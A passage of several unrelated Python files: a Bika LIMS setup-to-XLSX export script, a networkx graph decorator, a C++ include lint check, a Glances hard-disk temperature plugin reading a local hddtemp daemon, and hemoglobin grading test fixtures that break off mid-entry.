and type(value[0]) == dict):
return self.write_dict_field_values(instance, field)
else:
return value
def export_laboratory(self):
instance = self.portal.bika_setup.laboratory
ws = self.wb.create_sheet(title='Laboratory')
ws.page_setup.fitToHeight = 0
ws.page_setup.fitToWidth = 1
fields = self.get_fields(instance.schema)
for row, field in enumerate(fields):
ws.cell(column=1, row=row + 1).value = field.getName()
value = self.mutate(instance, field)
ws.cell(column=2, row=row + 1).value = value
def export_bika_setup(self):
instance = self.portal.bika_setup
ws = self.wb.create_sheet(title='BikaSetup')
fields = self.get_fields(instance.schema)
for row, field in enumerate(fields):
ws.cell(column=1, row=row + 1).value = field.getName()
value = self.mutate(instance, field)
ws.cell(column=2, row=row + 1).value = value
def export_portal_type(self, portal_type):
catalog = self.get_catalog(portal_type)
brains = catalog(portal_type=portal_type)
if not brains:
print "No objects of type %s found in %s" % (portal_type, catalog)
return
ws = self.wb.create_sheet(title=portal_type)
# Write headers
instance = brains[0].getObject()
fields = self.get_fields(instance.schema)
headers = ['path', 'uid']
headers += [f.getName() for f in fields]
for col, header in enumerate(headers):
ws.cell(column=col + 1, row=1).value = header
# Write values
portal_path = '/'.join(self.portal.getPhysicalPath())
for row, brain in enumerate(brains):
instance = brain.getObject()
# path
path = '/'.join(instance.getPhysicalPath()[:-1])
ws.cell(column=1, row=row + 2).value = \
path.replace(portal_path, '')
# uid
ws.cell(column=2, row=row + 2).value = instance.UID()
# then schema field values
for col, field in enumerate(fields):
value = self.mutate(instance, field)
ws.cell(column=col + 3, row=row + 2).value = value
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Export bika_setup into an Open XML (XLSX) workbook',
epilog='This script is meant to be run with zopepy or bin/instance. '
       'See http://docs.plone.org/develop/plone/misc/commandline.html '
       'for details.'
)
parser.add_argument(
'-s',
dest='sitepath',
default='Plone',
help='full path to site root (default: Plone)')
parser.add_argument(
'-u',
dest='username',
default='admin',
help='zope admin username (default: admin)')
parser.add_argument(
'-o',
dest='outputfile',
default='',
help='output zip file name (default: SITEPATH.zip)')
args, unknown = parser.parse_known_args()
if args.outputfile == '':
args.outputfile = args.sitepath + ".zip"
main = Main(args)
main()
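
# Usage sketch (hypothetical script name; the exact invocation depends on
# the buildout, as the epilog above notes):
#
#   bin/instance run export_bika_setup.py -s Plone -u admin -o backup.zip
#
# -s, -u and -o match the argparse options defined above; extra zope
# arguments are tolerated via parse_known_args().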
|
"""
pyblk._decorations._decorations
===============================
Tools to decorate networkx graphs in situ, i.e., as
constructed rather than as read from a textual file.
.. moduleauthor:: mulhern <amulhern@redhat.com>
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import networkx as nx
class Decorator(object):
"""
Decorate graph elements with attributes.
"""
@staticmethod
def _decorate(graph, properties, setter=nx.set_node_attributes):
"""
Decorate the graph.
:param `DiGraph` graph: the graph
:param properties: a dict of properties
:type properties: dict of property name -> graph element -> value
:param setter: a function to set the attributes
:type setter: function (one of networkx.set_{node, edge}_attributes)
"""
for property_name, value in properties.items():
setter(graph, property_name, value)
@classmethod
def decorate_nodes(cls, graph, properties):
"""
Decorate the graph.
:param `DiGraph` graph: the graph
:param properties: a dict of properties
:type properties: dict of property name -> graph element -> value
"""
cls._decorate(graph, properties, nx.set_node_attributes)
@classmethod
def decorate_edges(cls, graph, properties):
"""
Decorate the graph.
:param `DiGraph` graph: the graph
:param properties: a dict of properties
:type properties: dict of property name -> graph element -> value
"""
cls._decorate(graph, properties, nx.set_edge_attributes)
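
# Usage sketch (hypothetical graph data; note that _decorate calls the
# setter as setter(graph, name, values), i.e. the networkx 1.x signature
# of set_node_attributes/set_edge_attributes):
#
#   graph = nx.DiGraph()
#   graph.add_edge('sda', 'sda1')
#   Decorator.decorate_nodes(graph, {'TYPE': {'sda': 'disk', 'sda1': 'partition'}})
#   graph.node['sda']['TYPE']  # 'disk' (networkx 1.x attribute access)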
|
"""Checks that cstdlib is included for some of its functions that we use
commonly.
Older Macs that build with libc++ instead of libstc++ need this.
"""
import re
FUNCTION_REGEX = re.compile(
r"""((\s|std::|\(|\[)(abs|ato[fil]|atoll|strto[dfl]|strtol[ld]|strtoul[l]{0,1}|malloc|getenv)|(\bstd::[s]{0,1}rand))\(""")
def does_include_cstdlib(lines, fn):
includes_cstdlib = False
for lineno, line in enumerate(lines, 1):
if line.startswith('#include <cstdlib>'):
includes_cstdlib = True
matches = []
for match in FUNCTION_REGEX.findall(line):
matches.append(match[0].strip())
if matches and not includes_cstdlib:
return [(fn, lineno,
'This file uses ' + ', '.join(matches) + ' but does not include <cstdlib>.')]
return []
evaluate_matches = does_include_cstdlib
allowed = [
"""#include <cstdlib>
std::abs(-5);
""",
"""#include <cstdlib>
std::strtoull;
""",
"""
uint32_t const hit = game.logic_rand() % 100;
""",
"""
uint32_t rand();
"""
]
forbidden = [
"""
const long int x = strtol(endp, &endp, 0);
""",
"""
std::abs(-5);
""",
"""
std::abs(-5);
""",
"""
std::strtoull(endp, &endp, 0);
""",
"""
std::strtoull(endp, &endp, 0);
""",
]
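
# Self-check sketch: the allowed/forbidden samples above double as inputs
# for the checker itself.
if __name__ == '__main__':
    assert does_include_cstdlib(allowed[0].splitlines(), 'ok.cc') == []
    errors = does_include_cstdlib(forbidden[0].splitlines(), 'bad.cc')
    assert errors and 'does not include <cstdlib>' in errors[0][2]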
|
"""HDD temperature plugin."""
import os
import socket
from ocglances.compat import nativestr, range
from ocglances.logger import logger
from ocglances.plugins.glances_plugin import GlancesPlugin
class Plugin(GlancesPlugin):
"""Glances HDD temperature sensors plugin.
stats is a list
"""
def __init__(self, args=None):
"""Init the plugin."""
super(Plugin, self).__init__(args=args)
# Init the sensor class
self.glancesgrabhddtemp = GlancesGrabHDDTemp(args=args)
# We do not want to display the stat in a dedicated area
# The HDD temp is displayed within the sensors plugin
self.display_curse = False
# Init stats
self.reset()
def reset(self):
"""Reset/init the stats."""
self.stats = []
@GlancesPlugin._check_decorator
@GlancesPlugin._log_result_decorator
def update(self):
"""Update HDD stats using the input method."""
# Reset stats
self.reset()
if self.input_method == 'local':
# Update stats using the standard system lib
self.stats = self.glancesgrabhddtemp.get()
else:
# Update stats using SNMP
# Not available for the moment
pass
return self.stats
class GlancesGrabHDDTemp(object):
"""Get hddtemp stats using a socket connection."""
def __init__(self, host='127.0.0.1', port=7634, args=None):
"""Init hddtemp stats."""
self.args = args
self.host = host
self.port = port
self.cache = ""
self.reset()
def reset(self):
"""Reset/init the stats."""
self.hddtemp_list = []
def __update__(self):
"""Update the stats."""
# Reset the list
self.reset()
# Fetch the data
# data = ("|/dev/sda|WDC WD2500JS-75MHB0|44|C|"
# "|/dev/sdb|WDC WD2500JS-75MHB0|35|C|"
# "|/dev/sdc|WDC WD3200AAKS-75B3A0|45|C|"
# "|/dev/sdd|WDC WD3200AAKS-75B3A0|45|C|"
# "|/dev/sde|WDC WD3200AAKS-75B3A0|43|C|"
# "|/dev/sdf|???|ERR|*|"
# "|/dev/sdg|HGST HTS541010A9E680|SLP|*|"
# "|/dev/sdh|HGST HTS541010A9E680|UNK|*|")
data = self.fetch()
# Exit if no data
if data == "":
return
# Safety check to avoid malformed data
# Considering the size of "|/dev/sda||0||" as the minimum
if len(data) < 14:
data = self.cache if len(self.cache) > 0 else self.fetch()
self.cache = data
try:
fields = data.split(b'|')
except TypeError:
fields = ""
devices = (len(fields) - 1) // 5
for item in range(devices):
offset = item * 5
hddtemp_current = {}
device = os.path.basename(nativestr(fields[offset + 1]))
temperature = fields[offset + 3]
unit = nativestr(fields[offset + 4])
hddtemp_current['label'] = device
try:
hddtemp_current['value'] = float(temperature)
except ValueError:
# Temperature could be 'ERR', 'SLP' or 'UNK' (see issue #824)
# Improper bytes/unicode in glances_hddtemp.py (see issue #887)
hddtemp_current['value'] = nativestr(temperature)
hddtemp_current['unit'] = unit
self.hddtemp_list.append(hddtemp_current)
def fetch(self):
"""Fetch the data from hddtemp daemon."""
# Taking care of sudden deaths/stops of hddtemp daemon
try:
sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sck.connect((self.host, self.port))
data = sck.recv(4096)
except socket.error as e:
logger.debug("Cannot connect to an HDDtemp server ({}:{} => {})".format(self.host, self.port, e))
logger.debug("Disable the HDDtemp module. Use the --disable-hddtemp to hide the previous message.")
if self.args is not None:
self.args.disable_hddtemp = True
data = ""
finally:
sck.close()
return data
def get(self):
"""Get HDDs list."""
self.__update__()
return self.hddtemp_list
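
# Parsing sketch (sample record taken from the comment in __update__
# above): each device contributes five '|'-separated fields, which is
# where the (len(fields) - 1) // 5 device count comes from.
#
#   sample = b"|/dev/sda|WDC WD2500JS-75MHB0|44|C|"
#   fields = sample.split(b'|')   # [b'', b'/dev/sda', b'WDC ...', b'44', b'C', b'']
#   (len(fields) - 1) // 5        # 1 device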
|
from datetime import date, timedelta
"Test Cases Start-HEMOGLOBIN"
DAYS_TO_SUBTRACT_1 = 58
G1_TEST_1 = {'result_value': 8.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_2 = {'result_value': 8.459, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_3 = {'result_value': 10.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_4 = {'result_value': 10.059, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_5 = {'result_value': 9.459, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_6 = {'result_value': 11.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_1 = {'result_value': 7.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_2 = {'result_value': 7.459, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_3 = {'result_value': 8.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_4 = {'result_value': 8.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_5 = {'result_value': 8.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G2_TEST_6 = {'result_value': 9.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_1 = {'result_value': 6.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_2 = {'result_value': 6.559, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_3 = {'result_value': 7.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_4 = {'result_value': 7.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_5 = {'result_value': 7.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G3_TEST_6 = {'result_value': 8.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G4_TEST_1 = {'result_value': 6.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G4_TEST_2 = {'result_value': 6.559, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G4_TEST_3 = {'result_value': 7.4444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G4_TEST_4 = {'result_value': 5.0000, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'POS'}
G1_TEST_25 = {'result_value': 9.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G1_TEST_26 = {'result_value': 10.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G1_TEST_27 = {'result_value': 10.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G1_TEST_28 = {'result_value': 10.955, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G1_TEST_29 = {'result_value': 10.555, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G1_TEST_30 = {'result_value': 11.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_25 = {'result_value': 8.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_26 = {'result_value': 8.959, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_27 = {'result_value': 9.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_28 = {'result_value': 9.959, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_29 = {'result_value': 9.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G2_TEST_30 = {'result_value': 10.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_25 = {'result_value': 6.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_26 = {'result_value': 6.959, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_27 = {'result_value': 8.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_28 = {'result_value': 8.959, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_29 = {'result_value': 8.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G3_TEST_30 = {'result_value': 9.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G4_TEST_17 = {'result_value': 6.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G4_TEST_18 = {'result_value': 7.059, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G4_TEST_19 = {'result_value': 7.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
G4_TEST_20 = {'result_value': 6.000, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_1),
'gender': 'MF',
'hiv_status': 'NEG'}
DAYS_TO_SUBTRACT_2 = 40
G1_TEST_7 = {'result_value': 8.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_8 = {'result_value': 8.455, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_9 = {'result_value': 9.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_10 = {'result_value': 9.455, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_11 = {'result_value': 9.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_12 = {'result_value': 10.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_7 = {'result_value': 6.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_8 = {'result_value': 7.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_9 = {'result_value': 8.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_10 = {'result_value': 8.455, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_11 = {'result_value': 8.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_12 = {'result_value': 9.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_7 = {'result_value': 5.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_8 = {'result_value': 6.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_9 = {'result_value': 6.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_10 = {'result_value': 6.955, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_11 = {'result_value': 6.911, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_12 = {'result_value': 7.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_5 = {'result_value': 5.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_6 = {'result_value': 6.155, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_7 = {'result_value': 6.054, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_8 = {'result_value': 5.000, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_2),
'gender': 'MF',
'hiv_status': 'ANY'}
DAYS_TO_SUBTRACT_3 = 30
G1_TEST_13 = {'result_value': 9.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_14 = {'result_value': 9.459, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_15 = {'result_value': 10.544, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_16 = {'result_value': 10.551, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_17 = {'result_value': 9.777, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_18 = {'result_value': 11.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_13 = {'result_value': 7.914, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_14 = {'result_value': 8.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_15 = {'result_value': 9.444, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_16 = {'result_value': 9.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_17 = {'result_value': 9.111, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G2_TEST_18 = {'result_value': 10.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_13 = {'result_value': 6.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_14 = {'result_value': 7.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_15 = {'result_value': 7.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_16 = {'result_value': 7.959, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_17 = {'result_value': 7.511, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G3_TEST_18 = {'result_value': 8.459, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_9 = {'result_value': 6.944, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_10 = {'result_value': 7.059, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_11 = {'result_value': 7.444, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
G4_TEST_12 = {'result_value': 6.000, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_3),
'gender': 'MF',
'hiv_status': 'ANY'}
DAYS_TO_SUBTRACT_4 = 20
G1_TEST_19 = {'result_value': 11.944, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_20 = {'result_value': 11.959, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_21 = {'result_value': 13.044, # TRUE
'test_code': 'HGB',
'datetime_drawn': date.today(),
'dob': date.today() - timedelta(days=DAYS_TO_SUBTRACT_4),
'gender': 'MF',
'hiv_status': 'ANY'}
G1_TEST_22 = {'result_value': 13.055, # FALSE
'test_code': 'HGB',
'datetime_drawn': date.today(),
